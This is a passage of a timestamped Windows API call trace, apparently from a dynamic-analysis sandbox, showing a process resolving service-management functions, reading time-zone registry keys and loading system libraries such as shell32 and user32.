[0087.477] SetEvent (hEvent=0xbc) returned 1 [0087.477] SetEvent (hEvent=0xb8) returned 1 [0087.477] CloseHandle (hObject=0x3ac) returned 1 [0087.478] GetProcAddress (hModule=0x76d10000, lpProcName="OpenServiceW") returned 0x76d1714b [0087.479] GetProcAddress (hModule=0x76d10000, lpProcName="CloseServiceHandle") returned 0x76d14dc3 [0087.479] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=40, lpWideCharStr=0x41d72c, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-Management-L2-1-0.dll\x01") returned 40 [0087.480] SysReAllocStringLen (in: pbstr=0x41e730*=0x0, psz="API-MS-WIN-Service-Management-L2-1-0.dll", len=0x28 | out: pbstr=0x41e730*="API-MS-WIN-Service-Management-L2-1-0.dll") returned 1 [0087.480] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-Management-L2-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-service-management-l2-1-0.dll") returned 0x28 [0087.480] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L2-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0087.480] GetLastError () returned 0x0 [0087.480] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e71c*=0x76d11074, NumberOfBytesToProtect=0x41e720, NewAccessProtection=0x4, OldAccessProtection=0x41e754 | out: BaseAddress=0x41e71c*=0x76d11000, NumberOfBytesToProtect=0x41e720, OldAccessProtection=0x41e754*=0x20) returned 0x0 [0087.481] GetCurrentProcess () returned 0xffffffff [0087.481] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e71c*=0x76d11074, NumberOfBytesToProtect=0x41e720, NewAccessProtection=0x20, OldAccessProtection=0x41e754 | out: BaseAddress=0x41e71c*=0x76d11000, NumberOfBytesToProtect=0x41e720, OldAccessProtection=0x41e754*=0x4) returned 0x0 [0087.481] GetCurrentProcess () returned 0xffffffff [0087.481] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e71c*=0x76d11088, NumberOfBytesToProtect=0x41e720, NewAccessProtection=0x4, OldAccessProtection=0x41e754 | out: BaseAddress=0x41e71c*=0x76d11000, NumberOfBytesToProtect=0x41e720, OldAccessProtection=0x41e754*=0x20) returned 0x0 [0087.482] GetCurrentProcess () returned 0xffffffff [0087.482] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e71c*=0x76d11088, NumberOfBytesToProtect=0x41e720, NewAccessProtection=0x20, OldAccessProtection=0x41e754 | out: BaseAddress=0x41e71c*=0x76d11000, NumberOfBytesToProtect=0x41e720, OldAccessProtection=0x41e754*=0x4) returned 0x0 [0087.482] GetProcAddress (hModule=0x76d10000, lpProcName="NotifyServiceStatusChangeW") returned 0x76d1a0ff [0087.483] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=36, lpWideCharStr=0x41d730, cchWideChar=2047 | out: lpWideCharStr="API-MS-WIN-Service-winsvc-L1-1-0.dllll\x01") returned 36 [0087.484] SysReAllocStringLen (in: pbstr=0x41e734*=0x0, psz="API-MS-WIN-Service-winsvc-L1-1-0.dll", len=0x24 | out: pbstr=0x41e734*="API-MS-WIN-Service-winsvc-L1-1-0.dll") returned 1 [0087.484] CharLowerBuffW (in: lpsz="API-MS-WIN-Service-winsvc-L1-1-0.dll", cchLength=0x24 | out: lpsz="api-ms-win-service-winsvc-l1-1-0.dll") returned 0x24 [0087.484] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-winsvc-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76d10000 [0087.484] GetLastError () returned 0x0 [0087.484] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e720*=0x76d11074, NumberOfBytesToProtect=0x41e724, NewAccessProtection=0x4, OldAccessProtection=0x41e758 | out: BaseAddress=0x41e720*=0x76d11000, NumberOfBytesToProtect=0x41e724, OldAccessProtection=0x41e758*=0x20) returned 0x0 [0087.485] GetCurrentProcess () returned 0xffffffff [0087.485] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e720*=0x76d11074, NumberOfBytesToProtect=0x41e724, NewAccessProtection=0x20, OldAccessProtection=0x41e758 | out: BaseAddress=0x41e720*=0x76d11000, NumberOfBytesToProtect=0x41e724, OldAccessProtection=0x41e758*=0x4) returned 0x0 [0087.485] GetCurrentProcess () returned 0xffffffff [0087.485] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e720*=0x76d11088, NumberOfBytesToProtect=0x41e724, NewAccessProtection=0x4, OldAccessProtection=0x41e758 | out: BaseAddress=0x41e720*=0x76d11000, NumberOfBytesToProtect=0x41e724, OldAccessProtection=0x41e758*=0x20) returned 0x0 [0087.485] GetCurrentProcess () returned 0xffffffff [0087.486] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e720*=0x76d11088, NumberOfBytesToProtect=0x41e724, NewAccessProtection=0x20, OldAccessProtection=0x41e758 | out: BaseAddress=0x41e720*=0x76d11000, NumberOfBytesToProtect=0x41e724, OldAccessProtection=0x41e758*=0x4) returned 0x0 [0087.486] GetProcAddress (hModule=0x76d10000, lpProcName="QueryServiceStatus") returned 0x76d14e4b [0087.487] GetCurrentThreadId () returned 0xba4 [0087.487] ResetEvent (hEvent=0xb8) returned 1 [0087.487] GetCurrentThreadId () returned 0xba4 [0087.487] GetCurrentThreadId () returned 0xba4 [0087.487] GetCurrentThreadId () returned 0xba4 [0087.487] GetCurrentThreadId () returned 0xba4 [0087.487] ResetEvent (hEvent=0xb8) returned 1 [0087.487] GetCurrentThreadId () returned 0xba4 [0087.487] GetCurrentThreadId () returned 0xba4 [0087.487] SetEvent (hEvent=0xbc) returned 1 [0087.487] SetEvent (hEvent=0xb8) returned 1 [0087.488] CloseHandle (hObject=0x3b0) returned 1 [0087.488] GetCurrentThreadId () returned 0xba4 [0087.488] ResetEvent (hEvent=0xb8) returned 1 [0087.488] GetCurrentThreadId () returned 0xba4 [0087.488] GetCurrentThreadId () returned 0xba4 [0087.488] GetCurrentThreadId () returned 0xba4 [0087.488] GetCurrentThreadId () returned 0xba4 [0087.488] ResetEvent (hEvent=0xb8) returned 1 [0087.488] GetCurrentThreadId () returned 0xba4 [0087.488] GetCurrentThreadId () returned 0xba4 [0087.488] SetEvent (hEvent=0xbc) returned 1 [0087.488] SetEvent (hEvent=0xb8) returned 1 [0087.488] CloseHandle (hObject=0x3ac) returned 1 [0087.488] GetProcAddress (hModule=0x76af0000, lpProcName="NdrAsyncClientCall") returned 0x76ba0aae [0098.138] GetProcAddress (hModule=0x76af0000, lpProcName="RpcAsyncCompleteCall") returned 0x76ba0d7c [0098.139] GetCurrentThreadId () returned 0xba4 [0098.139] ResetEvent (hEvent=0xb8) returned 1 [0098.139] GetCurrentThreadId () returned 0xba4 [0098.139] GetCurrentThreadId () returned 0xba4 [0098.139] GetCurrentThreadId () returned 0xba4 [0098.139] GetCurrentThreadId () returned 0xba4 [0098.139] ResetEvent (hEvent=0xb8) returned 1 [0098.139] GetCurrentThreadId () returned 0xba4 [0098.139] GetCurrentThreadId () returned 0xba4 [0098.139] SetEvent (hEvent=0xbc) returned 1 [0098.139] SetEvent (hEvent=0xb8) returned 1 [0098.139] CloseHandle (hObject=0x3a8) returned 1 [0098.147] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e76c | out: TokenHandle=0x41e76c*=0x3a8) returned 1 [0098.149] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x41e77c | out: TokenHandle=0x41e77c*=0x3b4) returned 1 [0098.155] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0098.155] GetTimeZoneInformation (in: lpTimeZoneInformation=0x41e97c | out: lpTimeZoneInformation=0x41e97c) returned 0x2 [0098.163] GetProcAddress (hModule=0x76d30000, lpProcName="GetDynamicTimeZoneInformation") returned 0x76dc460f [0098.163] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x41e7d0 | out: pTimeZoneInformation=0x41e7d0) returned 0x2 [0098.166] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x41e8b4 | out: phkResult=0x41e8b4*=0x3b8) returned 0x0 [0098.167] RegQueryValueExW (in: hKey=0x3b8, lpValueName="TZI", lpReserved=0x0, lpType=0x41e8d0, lpData=0x0, lpcbData=0x41e8cc*=0x0 | out: lpType=0x41e8d0*=0x3, lpData=0x0, lpcbData=0x41e8cc*=0x2c) returned 0x0 [0098.167] RegQueryValueExW (in: hKey=0x3b8, lpValueName="TZI", lpReserved=0x0, lpType=0x41e8d0, lpData=0x34277f4, lpcbData=0x41e8cc*=0x2c | out: lpType=0x41e8d0*=0x3, lpData=0x34277f4*, lpcbData=0x41e8cc*=0x2c) returned 0x0 [0098.168] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x41e708 | out: phkResult=0x41e708*=0x3bc) returned 0x0 [0098.169] RegQueryValueExW (in: hKey=0x3bc, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x41e724, lpData=0x0, lpcbData=0x41e720*=0x0 | out: lpType=0x41e724*=0x4, lpData=0x0, lpcbData=0x41e720*=0x4) returned 0x0 [0098.169] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueEx") returned 0x0 [0098.170] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0098.170] RegQueryValueExW (in: hKey=0x3bc, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x41e724, lpData=0x41e710, lpcbData=0x41e720*=0x4 | out: lpType=0x41e724*=0x4, lpData=0x41e710*=0x7d7, lpcbData=0x41e720*=0x4) returned 0x0 [0098.170] RegQueryValueExW (in: hKey=0x3bc, lpValueName="LastEntry", lpReserved=0x0, lpType=0x41e724, lpData=0x0, lpcbData=0x41e720*=0x0 | out: lpType=0x41e724*=0x4, lpData=0x0, lpcbData=0x41e720*=0x4) returned 0x0 [0098.170] RegQueryValueExW (in: hKey=0x3bc, lpValueName="LastEntry", lpReserved=0x0, lpType=0x41e724, lpData=0x41e710, lpcbData=0x41e720*=0x4 | out: lpType=0x41e724*=0x4, lpData=0x41e710*=0x7d8, lpcbData=0x41e720*=0x4) returned 0x0 [0098.170] RegQueryValueExW (in: hKey=0x3bc, lpValueName="2007", lpReserved=0x0, lpType=0x41e724, lpData=0x0, lpcbData=0x41e720*=0x0 | out: lpType=0x41e724*=0x3, lpData=0x0, lpcbData=0x41e720*=0x2c) returned 0x0 [0098.170] RegQueryValueExW (in: hKey=0x3bc, lpValueName="2007", lpReserved=0x0, lpType=0x41e724, lpData=0x3427c88, lpcbData=0x41e720*=0x2c | out: lpType=0x41e724*=0x3, lpData=0x3427c88*, lpcbData=0x41e720*=0x2c) returned 0x0 [0098.170] RegQueryValueExW (in: hKey=0x3bc, lpValueName="2008", lpReserved=0x0, lpType=0x41e724, lpData=0x0, lpcbData=0x41e720*=0x0 | out: lpType=0x41e724*=0x3, lpData=0x0, lpcbData=0x41e720*=0x2c) returned 0x0 [0098.170] RegQueryValueExW (in: hKey=0x3bc, lpValueName="2008", lpReserved=0x0, lpType=0x41e724, lpData=0x3427d48, lpcbData=0x41e720*=0x2c | out: lpType=0x41e724*=0x3, lpData=0x3427d48*, lpcbData=0x41e720*=0x2c) returned 0x0 [0098.171] RegCloseKey (hKey=0x3bc) returned 0x0 [0098.172] RegQueryValueExW (in: hKey=0x3b8, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x41e8a8, lpData=0x0, lpcbData=0x41e8a4*=0x0 | out: lpType=0x41e8a8*=0x1, lpData=0x0, lpcbData=0x41e8a4*=0x20) returned 0x0 [0098.172] RegQueryValueExW (in: hKey=0x3b8, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x41e8a8, lpData=0x3427e90, lpcbData=0x41e8a4*=0x20 | out: lpType=0x41e8a8*=0x1, lpData="@tzres.dll,-670", lpcbData=0x41e8a4*=0x20) returned 0x0 [0098.172] RegQueryValueExW (in: hKey=0x3b8, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x41e8a8, lpData=0x0, lpcbData=0x41e8a4*=0x0 | out: lpType=0x41e8a8*=0x1, lpData=0x0, lpcbData=0x41e8a4*=0x20) returned 0x0 [0098.172] RegQueryValueExW (in: hKey=0x3b8, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x41e8a8, lpData=0x3427ee8, lpcbData=0x41e8a4*=0x20 | out: lpType=0x41e8a8*=0x1, lpData="@tzres.dll,-672", lpcbData=0x41e8a4*=0x20) returned 0x0 [0098.172] RegQueryValueExW (in: hKey=0x3b8, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x41e8a8, lpData=0x0, lpcbData=0x41e8a4*=0x0 | out: lpType=0x41e8a8*=0x1, lpData=0x0, lpcbData=0x41e8a4*=0x20) returned 0x0 [0098.172] RegQueryValueExW (in: hKey=0x3b8, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x41e8a8, lpData=0x3427f40, lpcbData=0x41e8a4*=0x20 | out: lpType=0x41e8a8*=0x1, lpData="@tzres.dll,-671", lpcbData=0x41e8a4*=0x20) returned 0x0 [0098.175] SysReAllocStringLen (in: pbstr=0x41dc44*=0x0, psz="shell32.dll", len=0xb | out: pbstr=0x41dc44*="shell32.dll") returned 1 [0098.175] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0098.175] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0098.176] GetLastError () returned 0x7e [0098.176] SetLastError (dwErrCode=0x7e) [0098.181] SysReAllocStringLen (in: pbstr=0x41dc44*=0x0, psz="shell32.dll", len=0xb | out: pbstr=0x41dc44*="shell32.dll") returned 1 [0098.181] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0098.181] LoadLibraryExW (lpLibFileName="shell32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0098.181] GetLastError () returned 0x0 [0098.182] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d13b4, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x4, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d1000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x20) returned 0x0 [0098.182] GetCurrentProcess () returned 0xffffffff [0098.182] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d13b4, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x20, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d1000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x4) returned 0x0 [0098.183] GetCurrentProcess () returned 0xffffffff [0098.183] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d13c4, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x4, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d1000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x20) returned 0x0 [0098.183] GetCurrentProcess () returned 0xffffffff [0098.183] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d13c4, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x20, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d1000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x4) returned 0x0 [0098.184] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d21c0, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x4, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d2000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x20) returned 0x0 [0098.184] GetCurrentProcess () returned 0xffffffff [0098.184] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d21c0, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x20, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d2000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x4) returned 0x0 [0098.184] GetCurrentProcess () returned 0xffffffff [0098.184] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d224c, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x4, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d2000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x20) returned 0x0 [0098.184] GetCurrentProcess () returned 0xffffffff [0098.184] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dc2c*=0x759d224c, NumberOfBytesToProtect=0x41dc30, NewAccessProtection=0x20, OldAccessProtection=0x41dc64 | out: BaseAddress=0x41dc2c*=0x759d2000, NumberOfBytesToProtect=0x41dc30, OldAccessProtection=0x41dc64*=0x4) returned 0x0 [0098.185] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPath") returned 0x0 [0098.186] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0098.186] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0098.186] CoTaskMemAlloc (cb=0x20c) returned 0x74a0d0 [0098.186] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x74a0d0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0098.188] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0098.188] CoTaskMemFree (pv=0x74a0d0) [0098.190] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileMUIPath") returned 0x76dc4731 [0098.191] CoTaskMemAlloc (cb=0x20c) returned 0x74a0d0 [0098.191] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x41e8c4, pwszFileMUIPath=0x74a0d0, pcchFileMUIPath=0x41e8c8, pululEnumerator=0x41e8bc | out: pwszLanguage=0x0, pcchLanguage=0x41e8c4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x41e8c8, pululEnumerator=0x41e8bc) returned 1 [0098.199] CoTaskMemFree (pv=0x0) [0098.199] CoTaskMemFree (pv=0x74a0d0) [0098.201] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryEx") returned 0x0 [0098.207] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryW") returned 0x0 [0098.207] SysReAllocStringLen (in: pbstr=0x41e7e4*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x41e7e4*="tzres.dll.mui") returned 1 [0098.207] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0098.207] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x5b0001 [0098.211] GetLastError () returned 0x0 [0098.212] SysReAllocStringLen (in: pbstr=0x41dc10*=0x0, psz="user32.dll", len=0xa | out: pbstr=0x41dc10*="user32.dll") returned 1 [0098.212] CharLowerBuffW (in: lpsz="user32.dll", cchLength=0xa | out: lpsz="user32.dll") returned 0xa [0098.212] LoadLibraryExW (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x77130000 [0098.212] GetLastError () returned 0x0 [0098.212] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x7714035c, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.213] GetCurrentProcess () returned 0xffffffff [0098.213] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x7714035c, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.213] GetCurrentProcess () returned 0xffffffff [0098.213] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x7714036c, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.213] GetCurrentProcess () returned 0xffffffff [0098.213] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x7714036c, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.214] GetCurrentProcess () returned 0xffffffff [0098.214] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771403c0, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.215] GetCurrentProcess () returned 0xffffffff [0098.215] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771403c0, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.215] GetCurrentProcess () returned 0xffffffff [0098.215] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x7714044c, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.216] GetCurrentProcess () returned 0xffffffff [0098.216] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x7714044c, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.216] GetCurrentProcess () returned 0xffffffff [0098.216] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x77140454, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.217] GetCurrentProcess () returned 0xffffffff [0098.217] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x77140454, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.217] GetCurrentProcess () returned 0xffffffff [0098.217] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x77140488, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.218] GetCurrentProcess () returned 0xffffffff [0098.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x77140488, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.218] GetCurrentProcess () returned 0xffffffff [0098.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771404e0, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.218] GetCurrentProcess () returned 0xffffffff [0098.218] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771404e0, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.219] GetCurrentProcess () returned 0xffffffff [0098.219] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771404e4, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.220] GetCurrentProcess () returned 0xffffffff [0098.220] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771404e4, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.220] GetCurrentProcess () returned 0xffffffff [0098.221] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771404e8, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x4, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x20) returned 0x0 [0098.221] GetCurrentProcess () returned 0xffffffff [0098.221] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41dbf8*=0x771404e8, NumberOfBytesToProtect=0x41dbfc, NewAccessProtection=0x20, OldAccessProtection=0x41dc30 | out: BaseAddress=0x41dbf8*=0x77140000, NumberOfBytesToProtect=0x41dbfc, OldAccessProtection=0x41dc30*=0x4) returned 0x0 [0098.222] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringW") returned 0x77148eb9 [0098.223] CoTaskMemAlloc (cb=0x3ec) returned 0x74b678 [0098.223] LoadStringW (in: hInstance=0x5b0001, uID=0x29e, lpBuffer=0x74b678, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0098.223] CoTaskMemFree (pv=0x74b678) [0098.223] FreeLibrary (hLibModule=0x5b0001) returned 1 [0098.224] CoTaskMemAlloc (cb=0x20c) returned 0x739b38 [0098.224] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x739b38 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0098.224] CoTaskMemFree (pv=0x739b38) [0098.224] CoTaskMemAlloc (cb=0x20c) returned 0x739b38 [0098.224] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x41e8c4, pwszFileMUIPath=0x739b38, pcchFileMUIPath=0x41e8c8, pululEnumerator=0x41e8bc | out: pwszLanguage=0x0, pcchLanguage=0x41e8c4, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x41e8c8, pululEnumerator=0x41e8bc) returned 1 [0098.225] CoTaskMemFree (pv=0x0) [0098.225] CoTaskMemFree (pv=0x739b38) [0098.225] SysReAllocStringLen (in: pbstr=0x41e7e4*=0x0, psz="tzres.dll.mui", len=0xd | out: pbstr=0x41e7e4*="tzres.dll.mui") returned 1 [0098.225] CharLowerBuffW (in: lpsz="tzres.dll.mui", cchLength=0xd | out: lpsz="tzres.dll.mui") returned 0xd [0098.225] LoadLibraryExW 